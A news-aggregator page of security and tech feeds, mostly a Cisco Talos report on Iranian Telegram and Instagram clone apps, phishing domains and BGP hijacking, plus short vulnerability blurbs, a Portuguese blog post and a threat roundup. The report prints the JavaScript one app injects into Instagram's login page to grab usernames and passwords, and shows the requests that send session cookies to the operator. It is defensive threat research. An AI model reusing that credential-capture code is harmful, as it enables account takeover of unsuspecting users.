News aggregator

Popular WooCommerce WordPress Plugin Patches Critical Vulnerability

THN - Wed, 07/11/2018 - 07:01
If you own an eCommerce website built on WordPress and powered by WooCommerce plugin, then beware of a new vulnerability that could compromise your online store. Simon Scannell, a researcher at RIPS Technologies GmbH, discovered an arbitrary file deletion vulnerability in the popular WooCommerce plugin that could allow a malicious or compromised privileged user to gain full control over the

Meio Bit versão 3.0: um novo recomeço (sob nova direção!)

MeioBit - Tue, 06/11/2018 - 21:28

Caros, é com prazer e alegria que tenho ótimas novidades para contar a vocês. Conforme foi divulgado no Meio & Mensagem, o Meio Bit está sob nova direção, pois o site foi vendido para o Thiago Mobilon, dono do Tecnoblog e meu amigo pessoal, que é uma pessoa que confio para manter o site no caminho certo. Sim, a gente fez uma brincadeira de primeiro de abril alguns anos atrás sobre isso, mas agora é sério!

A transição começou há alguns meses, mas isso não vai mudar em nada a nossa linha editorial, como aliás não mudou uma vírgula até agora. Esse é mais um capítulo na trajetória do Meio Bit, um site criado em 2004 pelos primos e entusiastas de tecnologia Leo Faoro e Luiz Du Nercolini, que vai completar 15 anos no ar no ano que vem e se tornou um dos mais respeitados do país.

Não fui um dos fundadores, mas fui convocado para entrar na sociedade cerca de 10 anos atrás pelo meu trabalho no Digital Drops, e desde então trabalhei incansavelmente para que o MB fechasse mais negócios, alcançasse um público maior e fizesse mais sucesso.

No meio desta história, ainda encontrei tempo para trabalhar na Globo por alguns anos, onde ajudei a fundar e montar o TechTudo, que hoje é o maior site de tecnologia do Brasil, e que também compartilha do meu orgulho. Estes são dois trabalhos que realmente me enchem de alegria por ter feito.

O futuro do Meio Bit

Bom, agora chega de ficar falando de mim, este post é pra passar em definitivo o bastão do MB para o novo dono. Como disse no começo do post, o Mobilon é meu amigo pessoal desde que criamos nossos blogs de tecnologia na década passada, e é alguém que gosta e principalmente que se importa tanto com o futuro do Meio Bit quanto eu.

Além de compartilhar minha antiga paixão pelo MB, algo essencial para tocar este site, o Mobilon é um empreendedor nato, tem uma grande capacidade de realização, e foi capaz de transformar um blog pessoal como o Tecnoblog de antigamente na verdadeira potência editorial que é hoje.

Eu já tinha recebido outras propostas pelo site, mas nenhuma delas me garantia que o site seria mantido exatamente como ele é, o que pra mim era a única coisa essencial. Não existe nenhuma outra pessoa no mercado que pudesse me deixar mais tranquilo ao assumir o Meio Bit. O Mobilon tem o meu aval e a minha total confiança para manter e melhorar ainda mais o nível do site, que hoje está no ar com a mesma equipe, a mesma linha editorial, com textos caprichados a cada dia. Essa é a real vocação do MB.

Não pensem vocês que estou saindo do MB não, vou continuar por aqui, escrevendo alguns posts todo dia. A única diferença é que agora terei mais tempo para pesquisar e escrever meus textos com mais calma, sem ter que me preocupar com a parte burocrática do negócio.

Assim como o Cardoso e os outros autores do site, vou continuar escrevendo com prazer e alegria no MB, como tenho feito nos últimos 10 anos.  Com a venda, também terei mais tempo livre pra fazer muitos vídeos no meu canal, além de escrever posts nos meus sites DD e Blog de Brinquedo.

Essa não é a primeira mudança na sociedade do MB, e assim como da outra vez, o barco vai seguir da mesma forma, indo adiante na direção da excelência, do bom conteúdo formado pelos textos de qualidade que acreditamos, sejam o grande diferencial do site. Muitos falam que os blogs estão mortos, mas mostramos a cada dia que isso está bem longe de ser verdade.

Mas nada vai mudar no novo MB? Bem, algumas coisas vão mudar sim, mas pra muito melhor. O novo design e a nova marca, que eu pessoalmente adorei, achei muito mais minimalista e bem forte, é a novidade mais evidente, mas teremos outras. Em primeiro lugar, queria dar as boas vindas ao André Fogaça (ex-Canaltech e TudoCelular) e à Vivi Werneck (ex-TechTudo), que estão trabalhando com a gente na equipe.

Agradecimentos

Uma das coisas mais especiais de ter tido o privilégio de ter comandado o MB durante todo este tempo, foi poder fazer trabalhos incríveis com grandes empresas (de tecnologia ou não) como a HP, Microsoft, Samsung, Asus, Disney, TIM e Claro, entre muitas outras. A todas elas, um agradecimento imenso pela confiança depositada no site e em mim.

Não posso encerrar este post sem agradecer pessoalmente aos antigos sócios do site, Leo, Du, Marcellus e Moardib que me convidaram para escrever aqui, e também aos atuais autores do site, que estiveram sempre do meu lado travando esta justa batalha, Dori, Gilson, Max e Ronaldo, vocês são os caras, muito obrigado por tudo!

Também vai um agradecimento especial ao Carlos Cardoso, de quem eu lia textos incríveis antes de sonhar em entrar no MB, e que hoje se tornou um bom amigo, e é um cara que sempre vestiu a camisa deste site, não importa qual a situação.

Em se tratando de MB, ninguém é tão importante nessa equipe quanto o Cardoso. Citando Caetano, pra mim ele é a mais perfeita tradução do Meio Bit. Tem sido um prazer e um orgulho ter trabalhado e poder continuar trabalhando com ele, que além de amigo, também é o melhor inventor de nomes pra projetos que conheço.

Antes de terminar, o meu maior agradecimento é pra você, que está lendo minhas linhas. O MB não seria nada sem você, nosso querido leitor. Não é exagero, os leitores daqui engrandecem cada texto do site com seus comentários inteligentes, sempre em um debate muito saudável.

Ok, de vez em quando tem umas brigas, mas faz parte de qualquer comunidade. Nossos leitores e nossa comunidade são um patrimônio que não tem preço, que nenhum outro site de tecnologia do Brasil tem ou terá, pelo menos na minha humilde opinião. Assim como um time de futebol não é nada sem a sua torcida, o Meio Bit nada seria sem nossos leitores. Muito obrigado por tudo, e por favor, continuem lendo e comentando e compartilhando ainda mais os nossos posts.

Viva muito e prospere, Meio Bit! Muito obrigado por tudo, e seguimos juntos!

Leia também o post do Mobilon: Tecnoblog fecha aquisição do Meio Bit (e dessa vez não é 1º de abril)

O post Meio Bit versão 3.0: um novo recomeço (sob nova direção!) apareceu primeiro em Meio Bit.

The Pirate Bay Like 9 Best Torrent Sites (Updated Nov 2018)

THN - Tue, 06/11/2018 - 16:35
The Pirate Bay torrent search engine is one of the world's most famous and best torrent sites. But it has been caught second time mining digital currencies using visitors' computers. Like many popular torrent sites, the pirate bay also uses mining to make money without informing its users. But this time a tiny message on its homepage clarifies some terms of service but gives no option to

Flaws in Popular Self-Encrypting SSDs Let Attackers Decrypt Data

THN - Tue, 06/11/2018 - 07:21
We all have something to hide, something to protect. But if you are also relying on self-encrypting drives for that, then you should read this news carefully. Security researchers have discovered multiple critical vulnerabilities in some of the popular self-encrypting solid state drives (SSD) that could allow an attacker to decrypt disk encryption and recover protected data without knowing the

Persian Stalker pillages Iranian users of Instagram and Telegram

Talos - Mon, 05/11/2018 - 14:55
This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres, Vitor Ventura and with the contributions of Eric Kuhla.

Introduction
State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.
Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.


Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." It is not malicious enough to be classified as malware, but is suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically fulfills its functions that are expected by the user (ex. send messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.
Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while targeting secure messaging apps. Some actors are also hijacking the device's BGP protocol. This technique redirects the traffic of all routers, without the device considering the original of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and is easily detectable, so the new routes won't be in place for very long.
Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran and their nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.
A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. This same rule applies to the cloned applications, installing applications from untrusted sources implies a certain degree of risk that the users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.
TacticsFunctionality enhancement applications (grey)Andromedaa.ir and Cambridge Universal AcademyDescription of andromedaa.ir

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.
While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.Whois information for andromedaa.ir
The andromedaa.ir domain is registered with the [email protected] email address. This is the same email address used to registered other domains for the cloned Instagram and Telegram applications (see other sections below).
Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.
Partial list of the domains found
We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.
Certificate information
This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based off the low prevalence of those values in the SSL certificate, Talos associates this domain to the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.List of domains associated with the same IP address
Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.
Certificate information
Description of Cambridge Universal Academy

Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.

Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.


Business model


All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.Price list (original HTML errors where kept, translation by google.com)
While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing highlights the benefits of using this service rather than others.
Lik3.org marketing (translation by google.com)
It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.
Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.
The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.
Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.
Application examples
Follower Begir Instagram iOS application
The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.
First screen after logging in
The developer added some features such as virtual currency and Persian language support, among others.Certificate information
The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.
document.addEventListener('click', function() {
  try {
    var tu = document.querySelector('[name="username"]');
    var tp = document.querySelector('[name="password"]');
    var tpV = (typeof tp == 'undefined') ? '' : tp.value;
    var tuV = (typeof tu == 'undefined') ? '' : tu.value;
  } catch (err) {
    var tuV = '';
    var tpV = ''
  }
  var bd = document.getElementsByTagName('body')[0].innerText;
  var messageToPost = {
    'pu': tuV,
    'pp': tpV,
    'bd': bd
  };
  window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);
},false);

The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.
During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1
Host: v1.flbgr.com
SESSIONID: [redacted]
HEADER: vf1
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:
POST /start/fl.php?apk=35&m=ios HTTP/1.1
Host: ndrm.ir
HEADER: vf1
Connection: close
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Accept: */*
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:
Instructions to trust the developer certificate
The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.
Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.
Application description (translation by Google Translate)
We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.
Most recent Ozvbegir certificate
Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.
Older versions certificate
Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.
Ozvbegir classes structure
In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.
Update check and reply
Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and coincidently is the one with the ability to upgrade the application on mobile devices.The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.Phone number request
This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.
Sessions created on a single phone
The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
HEADER: bt6
ADMIN: web
Host: v1.ozvdarozv.com
Connection: close
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)

We identified more than 1 million subscribers on the Telegram chanel who automatically joined when they first opened the application.
Channel information
Bitgram_dev


Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.AseGram and BitGram on Google Play
Publisher information
Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.Application examples
AseGram


The AseGram application is available on Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.AseGram certificate
This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.Set proxy code
Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.
The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at cafebazaa.ir, an Iranian state-sanctioned Android application store.Advanced Telegram cafebazaar page (translation by Google translate)
It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find an legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.The application also contains code to use socks servers located in several countries, which can be used to circumvent the ban. However, during our research we have never seen these being used. On the other side, if the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.Fake websites
Spoofed Telegram Websites
The most straightforward approach to gain access to an end-user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.Fake Telegram login page
This domain was registered on July 25, 2017. Based on the tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — [email protected][.]com — used to register this domain, as well as other domains and its passive Domain Name Servers (pDNS) records suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears as though the website was built using the GitHub project called "Webogram," there were also strings in the source page to suggest this website's display was designed for iPhones.Source code GitHub.com reference
Newly identified Charming Kitten domains
While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," Which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same Modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.

This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.
BGP Routing Anomalies
Background
While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcement, Talos noticed some routing anomalies originating from an Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271, as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows for internet communications to occur when requesting a resource located outside of the requested network or autonomous system.
BGP is used across the internet to assist with the selection of the best path routing. It's important to note this can be manipulated at ISP levels depending on various factors, which BGP allows for route selection. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:
The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no mechanism for security other than some methods like MD5 passwords for neighbours, IPSec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route. This could result in some traffic passing through a predetermined, or sub-optimal route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. BGP hijacking sessions' effectiveness are measured based on the number of BGP peers who receive the update through messages. The more peers who receive the update message, the more likely traffic is being routed through the alternative sub-optimal path, that is pre-configured by the actor.
Pre-Planned Routing Activity from ASN 58224
One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.
This range potentially being hijacked was associated with Hungarian-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, this could have been a trial run for a larger BGP hijack attempt.
There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. When routers received this update message through the speaking system, they began routing some traffic destined to the Telegram servers through the ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.

How BGP Hijacking could have enabled computer network operationsTheoretically, this announcement could have one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as documented by other security researchers, two months prior in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been open-source reporting that suggests that Iran- based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with Telegram SMS verification codes needed to gain access to Telegram accounts.
This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.
The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.
Conclusions
The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found that there are several Telegram clones with several thousands installations that somehow contact IP addresses located in Iran, some of them that advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users' devices.
The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, are still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was the citizenship, it is understandable that the vast majority of any country's population won't be as cybersecurity educated as a cybersecurity professional, so even this classic technique could be highly effective.
While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assess with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, to route two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment statement also considers open-source reporting on Iran's complicated history with Telegram from passing laws banning the use of Telegram, to reports of outages resulting from Telegram's IP addresses being blocked in Iran.
Aside from the victims and the applications, Talos was unable to find any solid link between each of these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, being with or without state sponsorship. Talos assesses with high confidence that the users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.
IOCDomains
talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
andromedaa[.]ir
30dn[.]ir
ndrm[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
andromedaa[.]com
mobilecontinue[.]network
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn--oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

Hash values8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk

New Intel CPU Flaw Exploits Hyper-Threading to Steal Encrypted Data

THN - Sun, 04/11/2018 - 07:24
A team of security researchers has discovered another serious side-channel vulnerability in Intel CPUs that could allow an attacker to sniff out sensitive protected data, like passwords and cryptographic keys, from other processes running in the same CPU core with simultaneous multi-threading feature enabled. The vulnerability, codenamed PortSmash (CVE-2018-5407), has joined the list of other

Threat Roundup for Oct. 26 to Nov. 2

Talos - Fri, 02/11/2018 - 16:03


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 26 and Nov. 02. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Zbot-6732674-0
    Malware
    Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
     
  • Win.Malware.Sivis-6734391-0
    Malware
    Sivis is a type of trojan that is usually downloaded from the internet and installed by unsuspecting users. This trojan variant also includes sandbox evasion logic. It has the ability to move numerous files to the Recycle Bin.
     
  • Win.Malware.Explorerhijack-6734396-0
    Malware
    A hijacker could use this malware to change the user's browser's home page, redirect the user to suspicious websites, and then lead them to advertisements and commercial content that generates pay-per-click revenue for its developers.
     
  • Xls.Malware.Cwsp-6735643-0
    Malware
    This is an Excel-based downloader that uses PowerShell to retrieve the next stage of the malware executable. Microsoft Office displays a warning to the user before the payload actually gets activated.
     
  • Win.Trojan.Mikey-6735890-0
    Trojan
    This cluster focuses on malware that creates a specific cluster so the malware can achieve persistence. The samples have anti-analysis tricks to complicate the analysis. This family is known for the plugin architecture and for the intense network activity. This week, Mikey used the AppWizard packaging system. It is based on common Microsoft code, using the Microsoft Foundation Classes (MFC) to start a simple application. Malicious programs use this packer to stage process hollowing and obfuscate the malicious code.
     
ThreatsWin.Malware.Zbot-6732674-0
Indicators of Compromise
Registry Keys
  • <HKLM>\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
    • Value Name: userinit
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\ntos.exe
File Hashes
  • 0105bb0a81ceb78f84de07f7336a6ecdd95721545b3e47c96ae45f94a8fe8506
  • 0114885e69a066a72f12eb475c9ae36e0851309ce6902a547dd60915ab785523
  • 01be29f0973f96218bf0554f2212ee60fe8563a9fa5e9f1cc04b948a02a5989a
